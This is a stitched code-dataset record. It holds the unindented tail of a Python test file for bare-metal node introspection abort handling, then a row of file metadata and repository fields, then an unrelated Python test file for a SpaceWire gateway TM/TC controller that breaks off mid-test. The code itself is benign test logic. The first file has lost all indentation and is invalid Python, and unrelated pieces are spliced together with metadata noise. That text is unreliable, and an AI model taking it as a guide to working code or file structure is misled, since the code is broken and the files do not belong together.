cli = self._prepare(client_mock)
self.node_info.manage_boot = False
add_mock.return_value = self.node_info
introspect.introspect(self.node.uuid, manage_boot=False)
cli.node.get.assert_called_once_with(self.uuid)
add_mock.assert_called_once_with(self.uuid,
bmc_address=[self.bmc_address],
manage_boot=False,
ironic=cli)
self.node_info.ports.assert_called_once_with()
self.node_info.add_attribute.assert_called_once_with('mac',
self.macs)
self.sync_filter_mock.assert_called_with(cli)
self.assertFalse(cli.node.validate.called)
self.assertFalse(cli.node.set_boot_device.called)
self.assertFalse(cli.node.set_power_state.called)
@mock.patch.object(node_cache, 'get_node', autospec=True)
@mock.patch.object(ir_utils, 'get_client', autospec=True)
class TestAbort(BaseTest):
def setUp(self):
super(TestAbort, self).setUp()
self.node_info.started_at = None
self.node_info.finished_at = None
# NOTE(milan): node_info.finished() is a mock; no fsm_event call, then
self.fsm_calls = [
mock.call(istate.Events.abort, strict=False),
]
def test_ok(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = True
self.node_info.started_at = time.time()
self.node_info.finished_at = None
introspect.abort(self.node.uuid)
get_mock.assert_called_once_with(self.uuid, ironic=cli)
self.node_info.acquire_lock.assert_called_once_with(blocking=False)
self.sync_filter_mock.assert_called_once_with(cli)
cli.node.set_power_state.assert_called_once_with(self.uuid, 'off')
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.abort_end, error='Canceled by operator')
self.node_info.fsm_event.assert_has_calls(self.fsm_calls)
def test_no_manage_boot(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = True
self.node_info.started_at = time.time()
self.node_info.finished_at = None
self.node_info.manage_boot = False
introspect.abort(self.node.uuid)
get_mock.assert_called_once_with(self.uuid, ironic=cli)
self.node_info.acquire_lock.assert_called_once_with(blocking=False)
self.sync_filter_mock.assert_called_once_with(cli)
self.assertFalse(cli.node.set_power_state.called)
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.abort_end, error='Canceled by operator')
self.node_info.fsm_event.assert_has_calls(self.fsm_calls)
def test_node_not_found(self, client_mock, get_mock):
cli = self._prepare(client_mock)
exc = utils.Error('Not found.', code=404)
get_mock.side_effect = exc
self.assertRaisesRegex(utils.Error, str(exc),
introspect.abort, self.uuid)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertEqual(0, self.node_info.finished.call_count)
self.assertEqual(0, self.node_info.fsm_event.call_count)
def test_node_locked(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = False
self.node_info.started_at = time.time()
self.assertRaisesRegex(utils.Error, 'Node is locked, please, '
'retry later', introspect.abort, self.uuid)
self.assertEqual(0, self.sync_filter_mock.call_count)
self.assertEqual(0, cli.node.set_power_state.call_count)
self.assertEqual(0, self.node_info.finished.call_count)
self.assertEqual(0, self.node_info.fsm_event.call_count)
def test_firewall_update_exception(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = True
self.node_info.started_at = time.time()
self.node_info.finished_at = None
self.sync_filter_mock.side_effect = Exception('Boom')
introspect.abort(self.uuid)
get_mock.assert_called_once_with(self.uuid, ironic=cli)
self.node_info.acquire_lock.assert_called_once_with(blocking=False)
self.sync_filter_mock.assert_called_once_with(cli)
cli.node.set_power_state.assert_called_once_with(self.uuid, 'off')
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.abort_end, error='Canceled by operator')
self.node_info.fsm_event.assert_has_calls(self.fsm_calls)
def test_node_power_off_exception(self, client_mock, get_mock):
cli = self._prepare(client_mock)
get_mock.return_value = self.node_info
self.node_info.acquire_lock.return_value = True
self.node_info.started_at = time.time()
self.node_info.finished_at = None
cli.node.set_power_state.side_effect = Exception('BadaBoom')
introspect.abort(self.uuid)
get_mock.assert_called_once_with(self.uuid, ironic=cli)
self.node_info.acquire_lock.assert_called_once_with(blocking=False)
self.sync_filter_mock.assert_called_once_with(cli)
cli.node.set_power_state.assert_called_once_with(self.uuid, 'off')
self.node_info.finished.assert_called_once_with(
introspect.istate.Events.abort_end, error='Canceled by operator')
self.node_info.fsm_event.assert_has_calls(self.fsm_calls)
| 45.914851 | 79 | 0.624186 | 2,791 | 23,187 | 4.858474 | 0.088499 | 0.068437 | 0.083186 | 0.125369 | 0.814086 | 0.78326 | 0.759292 | 0.756047 | 0.739454 | 0.717257 | 0 | 0.005362 | 0.292233 | 23,187 | 504 | 80 | 46.005952 | 0.820913 | 0.028421 | 0 | 0.714286 | 0 | 0 | 0.030384 | 0.00151 | 0 | 0 | 0 | 0 | 0.345865 | 1 | 0.065163 | false | 0 | 0.032581 | 0 | 0.107769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0f1f2c7eeb48036250c1f2f70a4ccae625cac346 | 49,234 | py | Python | tests/unit_tests/test_component/marketplace/spacewire_gateway_hvs_h8823/test_spacewire_gateway_hvs_h8823_tmtc.py | ismaelJimenez/mamba_server | e6e2343291a0df24f226bde0d13e5bfa74cc3650 | [
"MIT"
] | null | null | null | tests/unit_tests/test_component/marketplace/spacewire_gateway_hvs_h8823/test_spacewire_gateway_hvs_h8823_tmtc.py | ismaelJimenez/mamba_server | e6e2343291a0df24f226bde0d13e5bfa74cc3650 | [
"MIT"
] | null | null | null | tests/unit_tests/test_component/marketplace/spacewire_gateway_hvs_h8823/test_spacewire_gateway_hvs_h8823_tmtc.py | ismaelJimenez/mamba_server | e6e2343291a0df24f226bde0d13e5bfa74cc3650 | [
"MIT"
] | null | null | null | import os
import pytest
import copy
import time
import socket
from rx import operators as op
from mamba.core.testing.utils import compose_service_info, get_config_dict, CallbackTestClass, get_provider_params_info
from mamba.core.context import Context
from mamba.marketplace.components.simulator.spacewire_gateway_hvs_h8823_tmtc_sim import H8823GatewayTmTcMock
from mamba.marketplace.components.spacewire_gateway.hvs_h8823_tmtc import H8823TmTcController
from mamba.core.exceptions import ComponentConfigException
from mamba.core.msg import Empty, ServiceRequest, ServiceResponse, ParameterType
component_path = os.path.join('marketplace', 'components', 'spacewire_gateway',
'hvs_h8823_tmtc')
class TestClass:
def setup_class(self):
""" setup_class called once for the class """
self.mamba_path = os.path.join(os.path.dirname(__file__), '..', '..',
'..', '..', '..', 'mamba')
self.default_component_config = get_config_dict(
os.path.join(self.mamba_path, component_path, 'config.yml'))
self.default_service_info = compose_service_info(
self.default_component_config)
def teardown_class(self):
""" teardown_class called once for the class """
pass
def setup_method(self):
""" setup_method called for every method """
self.context = Context()
self.context.set(
'mamba_dir',
os.path.join(os.path.dirname(__file__), '..', '..', '..', '..',
'..', 'mamba'))
def teardown_method(self):
""" teardown_method called for every method """
del self.context
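# Note: every test gets a fresh Context (and thus fresh rx subjects) from
# setup_method, so subscriptions and shared memory never leak between tests.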
def test_wo_context(self):
""" Test component behaviour without required context """
with pytest.raises(TypeError) as excinfo:
H8823TmTcController()
assert "missing 1 required positional argument" in str(excinfo.value)
def test_w_default_context_component_creation(self):
""" Test component creation behaviour with default context """
component = H8823TmTcController(self.context)
# Test default configuration load
assert component._configuration == self.default_component_config
# Test custom variables default values
assert component._shared_memory == {}
assert component._shared_memory_getter == {}
assert component._shared_memory_setter == {}
assert component._parameter_info == {}
assert component._inst is None
assert component._inst_cyclic_tm is None
assert component._inst_cyclic_tm_thread is None
assert component._cyclic_tm_mapping == {}
assert component._instrument.address == '0.0.0.0'
assert component._instrument.port is None
assert component._instrument.tc_port == 12345
assert component._instrument.tm_port == 12346
assert component._instrument.encoding == 'utf-8'
assert component._instrument.terminator_write == '\n'
assert component._instrument.terminator_read == '\n'
def test_w_default_context_component_initialization(self):
""" Test component initialization behaviour with default context """
component = H8823TmTcController(self.context)
component.initialize()
# Test default configuration load
assert component._configuration == self.default_component_config
# Test custom variables default values
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 0,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert component._shared_memory_getter == {
'bytes_received_counter': 'bytes_received_counter',
'connected': 'connected',
'credit_error_counter': 'credit_error_counter',
'disconnect_error_counter': 'disconnect_error_counter',
'eep_received_counter': 'eep_received_counter',
'eep_sent_counter': 'eep_sent_counter',
'eop_received_counter': 'eop_received_counter',
'eop_sent_counter': 'eop_sent_counter',
'escape_error_counter': 'escape_error_counter',
'parity_error_counter': 'parity_error_counter',
'spw_link_autostart': 'spw_link_autostart',
'spw_link_bytes_sent_counter': 'spw_link_bytes_sent_counter',
'spw_link_enabled': 'spw_link_enabled',
'spw_link_running': 'spw_link_running',
'spw_link_rx_rate': 'spw_link_rx_rate',
'spw_link_start': 'spw_link_start',
'spw_link_status': 'spw_link_status',
'spw_link_tcp_connected': 'spw_link_tcp_connected',
'spw_link_timecode_enabled': 'spw_link_timecode_enabled',
'spw_link_tx_rate': 'spw_link_tx_rate',
'ticks_received_counter': 'ticks_received_counter'
}
assert component._shared_memory_setter == {
'bytes_received_counter': 'bytes_received_counter',
'connect': 'connected',
'credit_error_counter': 'credit_error_counter',
'disconnect_error_counter': 'disconnect_error_counter',
'eep_received_counter': 'eep_received_counter',
'eep_sent_counter': 'eep_sent_counter',
'eop_received_counter': 'eop_received_counter',
'eop_sent_counter': 'eop_sent_counter',
'escape_error_counter': 'escape_error_counter',
'parity_error_counter': 'parity_error_counter',
'spw_link_autostart': 'spw_link_autostart',
'spw_link_bytes_sent_counter': 'spw_link_bytes_sent_counter',
'spw_link_enabled': 'spw_link_enabled',
'spw_link_running': 'spw_link_running',
'spw_link_rx_rate': 'spw_link_rx_rate',
'spw_link_start': 'spw_link_start',
'spw_link_status': 'spw_link_status',
'spw_link_tcp_connected': 'spw_link_tcp_connected',
'spw_link_timecode_enabled': 'spw_link_timecode_enabled',
'spw_link_tx_rate': 'spw_link_tx_rate',
'ticks_received_counter': 'ticks_received_counter'
}
assert component._parameter_info == self.default_service_info
assert component._inst is None
assert component._inst_cyclic_tm is None
assert component._inst_cyclic_tm_thread is None
assert component._cyclic_tm_mapping == {
'bytes_received_counter': 'SPWG_TM_SPW_RX_BYTE_CTR {:}',
'credit_error_counter': 'SPWG_TM_SPW_CRED_ERR_CTR {:}',
'disconnect_error_counter': 'SPWG_TM_SPW_DISC_ERR_CTR {:}',
'eep_received_counter': 'SWPG_TM_SPW_RX_EEP_CTR {:}',
'eep_sent_counter': 'SPWG_TM_SPW_TX_EEP_CTR {:}',
'eop_received_counter': 'SPWG_TM_SPW_RX_EOP_CTR {:}',
'eop_sent_counter': 'SPWG_TM_SPW_TX_EOP_CTR {:}',
'escape_error_counter': 'SPWG_TM_SPW_ESC_ERR_CTR {:}',
'parity_error_counter': 'SPWG_TM_SPW_PAR_ERR_CTR {:}',
'spw_link_autostart': 'SPWG_TM_SPW_AUTOSTART {:}',
'spw_link_bytes_sent_counter': 'SPWG_TM_SPW_TX_BYTE_CTR {:}',
'spw_link_enabled': 'SPWG_TM_SPW_ENABLED {:}',
'spw_link_running': 'SPWG_TM_SPW_RUNNING {:}',
'spw_link_rx_rate': 'SPWG_TM_SPW_RX_RATE {:}',
'spw_link_start': 'SPWG_TM_SPW_START {:}',
'spw_link_status': 'SPWG_TM_SPW_STS {:}',
'spw_link_tcp_connected': 'SPWG_TM_SPW_TCP_CONN {:}',
'spw_link_timecode_enabled': 'SPWG_TM_SPW_TIMECODE_ENABLED {:}',
'spw_link_tx_rate': 'SPWG_TM_SPW_TX_CLK {:}',
'ticks_received_counter': 'SPWG_TM_SPW_RX_TICK_CTR {:}'
}
assert component._instrument.address == '0.0.0.0'
assert component._instrument.port is None
assert component._instrument.tc_port == 12345
assert component._instrument.tm_port == 12346
assert component._instrument.encoding == 'utf-8'
assert component._instrument.terminator_write == '\n'
assert component._instrument.terminator_read == '\n'
def test_w_custom_context(self):
""" Test component creation behaviour with default context """
component = H8823TmTcController(
self.context,
local_config={
'name': 'custom_name',
'instrument': {
'port': 9000
},
'parameters': {
'new_param': {
'description': 'New parameter description',
'set': {
'signature': [{
'param_1': {
'type': 'str'
}
}],
'instrument_command': [{
'write': '{:}'
}]
},
}
}
})
component.initialize()
custom_component_config = copy.deepcopy(self.default_component_config)
custom_component_config['name'] = 'custom_name'
custom_component_config['instrument']['port'] = 9000
custom_component_config['parameters']['new_param'] = {
'description': 'New parameter description',
'set': {
'signature': [{
'param_1': {
'type': 'str'
}
}],
'instrument_command': [{
'write': '{:}'
}]
},
}
# Test default configuration load
assert component._configuration == custom_component_config
# Test custom variables default values
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 0,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert component._shared_memory_getter == {
'bytes_received_counter': 'bytes_received_counter',
'connected': 'connected',
'credit_error_counter': 'credit_error_counter',
'disconnect_error_counter': 'disconnect_error_counter',
'eep_received_counter': 'eep_received_counter',
'eep_sent_counter': 'eep_sent_counter',
'eop_received_counter': 'eop_received_counter',
'eop_sent_counter': 'eop_sent_counter',
'escape_error_counter': 'escape_error_counter',
'parity_error_counter': 'parity_error_counter',
'spw_link_autostart': 'spw_link_autostart',
'spw_link_bytes_sent_counter': 'spw_link_bytes_sent_counter',
'spw_link_enabled': 'spw_link_enabled',
'spw_link_running': 'spw_link_running',
'spw_link_rx_rate': 'spw_link_rx_rate',
'spw_link_start': 'spw_link_start',
'spw_link_status': 'spw_link_status',
'spw_link_tcp_connected': 'spw_link_tcp_connected',
'spw_link_timecode_enabled': 'spw_link_timecode_enabled',
'spw_link_tx_rate': 'spw_link_tx_rate',
'ticks_received_counter': 'ticks_received_counter'
}
assert component._shared_memory_setter == {
'bytes_received_counter': 'bytes_received_counter',
'connect': 'connected',
'credit_error_counter': 'credit_error_counter',
'disconnect_error_counter': 'disconnect_error_counter',
'eep_received_counter': 'eep_received_counter',
'eep_sent_counter': 'eep_sent_counter',
'eop_received_counter': 'eop_received_counter',
'eop_sent_counter': 'eop_sent_counter',
'escape_error_counter': 'escape_error_counter',
'parity_error_counter': 'parity_error_counter',
'spw_link_autostart': 'spw_link_autostart',
'spw_link_bytes_sent_counter': 'spw_link_bytes_sent_counter',
'spw_link_enabled': 'spw_link_enabled',
'spw_link_running': 'spw_link_running',
'spw_link_rx_rate': 'spw_link_rx_rate',
'spw_link_start': 'spw_link_start',
'spw_link_status': 'spw_link_status',
'spw_link_tcp_connected': 'spw_link_tcp_connected',
'spw_link_timecode_enabled': 'spw_link_timecode_enabled',
'spw_link_tx_rate': 'spw_link_tx_rate',
'ticks_received_counter': 'ticks_received_counter'
}
custom_service_info = compose_service_info(custom_component_config)
assert component._parameter_info == custom_service_info
assert component._inst is None
assert component._inst_cyclic_tm is None
assert component._inst_cyclic_tm_thread is None
assert component._cyclic_tm_mapping == {
'bytes_received_counter': 'SPWG_TM_SPW_RX_BYTE_CTR {:}',
'credit_error_counter': 'SPWG_TM_SPW_CRED_ERR_CTR {:}',
'disconnect_error_counter': 'SPWG_TM_SPW_DISC_ERR_CTR {:}',
'eep_received_counter': 'SWPG_TM_SPW_RX_EEP_CTR {:}',
'eep_sent_counter': 'SPWG_TM_SPW_TX_EEP_CTR {:}',
'eop_received_counter': 'SPWG_TM_SPW_RX_EOP_CTR {:}',
'eop_sent_counter': 'SPWG_TM_SPW_TX_EOP_CTR {:}',
'escape_error_counter': 'SPWG_TM_SPW_ESC_ERR_CTR {:}',
'parity_error_counter': 'SPWG_TM_SPW_PAR_ERR_CTR {:}',
'spw_link_autostart': 'SPWG_TM_SPW_AUTOSTART {:}',
'spw_link_bytes_sent_counter': 'SPWG_TM_SPW_TX_BYTE_CTR {:}',
'spw_link_enabled': 'SPWG_TM_SPW_ENABLED {:}',
'spw_link_running': 'SPWG_TM_SPW_RUNNING {:}',
'spw_link_rx_rate': 'SPWG_TM_SPW_RX_RATE {:}',
'spw_link_start': 'SPWG_TM_SPW_START {:}',
'spw_link_status': 'SPWG_TM_SPW_STS {:}',
'spw_link_tcp_connected': 'SPWG_TM_SPW_TCP_CONN {:}',
'spw_link_timecode_enabled': 'SPWG_TM_SPW_TIMECODE_ENABLED {:}',
'spw_link_tx_rate': 'SPWG_TM_SPW_TX_CLK {:}',
'ticks_received_counter': 'SPWG_TM_SPW_RX_TICK_CTR {:}'
}
def test_w_wrong_custom_context(self):
""" Test component creation behaviour with default context """
# Test with wrong topics dictionary
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'parameters': 'wrong'
}).initialize()
assert 'Parameters configuration: wrong format' in str(excinfo.value)
# In case no new parameters are given, use the default ones
component = H8823TmTcController(self.context,
local_config={'parameters': {}})
component.initialize()
assert component._configuration == self.default_component_config
# Test with missing address
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'instrument': {
'address': None
}
}).initialize()
assert "Missing address in Instrument Configuration" in str(
excinfo.value)
# Test with missing port
with pytest.raises(ComponentConfigException) as excinfo:
H8823TmTcController(self.context,
local_config={
'instrument': {
'port': None
}
}).initialize()
assert "Missing port in Instrument Configuration" in str(excinfo.value)
# Test case properties do not have a getter, setter or default
component = H8823TmTcController(
self.context, local_config={'parameters': {
'new_param': {}
}})
component.initialize()
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 0,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
def test_io_signature_publication(self):
""" Test component io_signature observable """
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_service_signature'].subscribe(
dummy_test_class.test_func_1)
component = H8823TmTcController(self.context)
component.initialize()
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 1
received_params_info = str([
str(parameter_info)
for parameter_info in dummy_test_class.func_1_last_value
])
expected_params_info = str([
str(parameter_info) for parameter_info in get_provider_params_info(
self.default_component_config, self.default_service_info)
])
assert received_params_info == expected_params_info
component = H8823TmTcController(
self.context,
local_config={
'name': 'custom_name',
'instrument': {
'address': '1.2.3.4'
},
'parameters': {
'new_param': {
'description': 'New parameter description',
'set': {
'signature': [{
'param_1': {
'type': 'str'
}
}],
'instrument_command': [{
'write': '{:}'
}]
},
}
}
})
component.initialize()
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 2
custom_component_config = copy.deepcopy(self.default_component_config)
custom_component_config['name'] = 'custom_name'
custom_component_config['instrument']['address'] = '1.2.3.4'
parameters = {
'new_param': {
'description': 'New parameter description',
'set': {
'signature': [{
'param_1': {
'type': 'str'
}
}],
'instrument_command': [{
'write': '{:}'
}]
},
}
}
parameters.update(custom_component_config['parameters'])
custom_component_config['parameters'] = parameters
custom_service_info = compose_service_info(custom_component_config)
received_params_info = str([
str(parameter_info)
for parameter_info in dummy_test_class.func_1_last_value
])
expected_params_info = str([
str(parameter_info) for parameter_info in get_provider_params_info(
custom_component_config, custom_service_info)
])
assert received_params_info == expected_params_info
def test_io_service_request_observer(self):
""" Test component io_service_request observer """
# Start Mock
mock = H8823GatewayTmTcMock(self.context)
mock.initialize()
# Start Test
component = H8823TmTcController(self.context)
component.initialize()
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_result'].pipe(
op.filter(lambda value: value.type != ParameterType.set and value.
type != ParameterType.error)).subscribe(
dummy_test_class.test_func_1)
self.context.rx['io_result'].pipe(
op.filter(lambda value: value.type == ParameterType.set or value.
type == ParameterType.error)).subscribe(
dummy_test_class.test_func_2)
# 1 - Test that component only gets activated for implemented services
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='NOT_EXISTING',
type='any',
args=[]))
assert dummy_test_class.func_1_times_called == 0
assert dummy_test_class.func_1_last_value is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(provider='NOT_EXISTING',
id='connect',
type='any',
args=[]))
assert dummy_test_class.func_1_times_called == 0
assert dummy_test_class.func_1_last_value is None
# 2 - Test generic command before connection to the instrument has been established
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_autostart',
type=ParameterType.get,
args=[]))
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 1
assert dummy_test_class.func_1_last_value.id == 'spw_link_autostart'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == '0 0 0 0'
# 3 - Test connection to the instrument
assert component._inst is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['1']))
time.sleep(.1)
assert component._inst is not None
assert dummy_test_class.func_2_times_called == 1
assert dummy_test_class.func_2_last_value.id == 'connect'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
assert component._inst_cyclic_tm is not None
assert component._inst_cyclic_tm_thread is not None
assert dummy_test_class.func_1_times_called == 21
assert dummy_test_class.func_1_last_value.id == 'ticks_received_counter'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == '0 0 0 0'
# 4 - Test generic command with wrong number of parameters
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_reset',
type=ParameterType.set,
args=[]))
time.sleep(.1)
assert dummy_test_class.func_2_times_called == 2
assert dummy_test_class.func_2_last_value.id == 'spw_link_reset'
assert dummy_test_class.func_2_last_value.type == ParameterType.error
assert dummy_test_class.func_2_last_value.value == "Wrong number or arguments for spw_link_reset.\n Expected: [{'port': {'type': 'int', 'range': [0, 3]}}];\n Received: []"
# 5 - Test generic command
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_reset',
type=ParameterType.set,
args=['0']))
time.sleep(.1)
assert dummy_test_class.func_2_times_called == 3
assert dummy_test_class.func_2_last_value.id == 'spw_link_reset'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
# 6 - Test generic query
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_enabled',
type=ParameterType.get,
args=[]))
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 22
assert dummy_test_class.func_1_last_value.id == 'spw_link_enabled'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == '0 0 0 0'
# 7 - Test shared memory set
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_tx_rate',
type=ParameterType.set,
args=['0', '10']))
time.sleep(.1)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '0 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
assert dummy_test_class.func_2_times_called == 4
assert dummy_test_class.func_2_last_value.id == 'spw_link_tx_rate'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
time.sleep(4.6)
assert component._shared_memory == {
'bytes_received_counter': '0 0 0 0',
'connected': 1,
'credit_error_counter': '0 0 0 0',
'disconnect_error_counter': '0 0 0 0',
'eep_received_counter': '0 0 0 0',
'eep_sent_counter': '0 0 0 0',
'eop_received_counter': '0 0 0 0',
'eop_sent_counter': '0 0 0 0',
'escape_error_counter': '0 0 0 0',
'parity_error_counter': '0 0 0 0',
'spw_link_autostart': '0 0 0 0',
'spw_link_bytes_sent_counter': '0 0 0 0',
'spw_link_enabled': '0 0 0 0',
'spw_link_running': '0 0 0 0',
'spw_link_rx_rate': '0 0 0 0',
'spw_link_start': '0 0 0 0',
'spw_link_status': '0 0 0 0',
'spw_link_tcp_connected': '0 0 0 0',
'spw_link_timecode_enabled': '0 0 0 0',
'spw_link_tx_rate': '10 0 0 0',
'ticks_received_counter': '0 0 0 0'
}
# 8 - Test shared memory get
assert dummy_test_class.func_1_times_called == 42
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='spw_link_tx_rate',
type=ParameterType.get,
args=[]))
time.sleep(.1)
assert dummy_test_class.func_1_times_called == 43
assert dummy_test_class.func_1_last_value.id == 'spw_link_tx_rate'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == '10 0 0 0'
# 9 - Test disconnection to the instrument
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connect',
type=ParameterType.set,
args=['0']))
time.sleep(.1)
assert component._inst is None
assert dummy_test_class.func_2_times_called == 5
assert dummy_test_class.func_2_last_value.id == 'connect'
assert dummy_test_class.func_2_last_value.type == ParameterType.set
assert dummy_test_class.func_2_last_value.value is None
self.context.rx['io_service_request'].on_next(
ServiceRequest(
provider='hvs_h8823_spacewire_ethernet_gateway_tmtc',
id='connected',
type=ParameterType.get,
args=[]))
time.sleep(.1)
assert component._inst is None
assert dummy_test_class.func_1_times_called == 44
assert dummy_test_class.func_1_last_value.id == 'connected'
assert dummy_test_class.func_1_last_value.type == ParameterType.get
assert dummy_test_class.func_1_last_value.value == 0
self.context.rx['quit'].on_next(Empty())
time.sleep(1)
def test_connection_wrong_instrument_address(self):
dummy_test_class = CallbackTestClass()
# Subscribe to the topic that shall be published
self.context.rx['io_result'].pipe(
op.filter(
lambda value: isinstance(value, ServiceResponse))).subscribe(
dummy_test_class.test_func_1)
# Test simulated normal connection to the instrument
component = H8823TmTcController(
self.context,
local_config={'instrument': {
'port': {
'tc': 1000,
'tm': 1001
}
}})
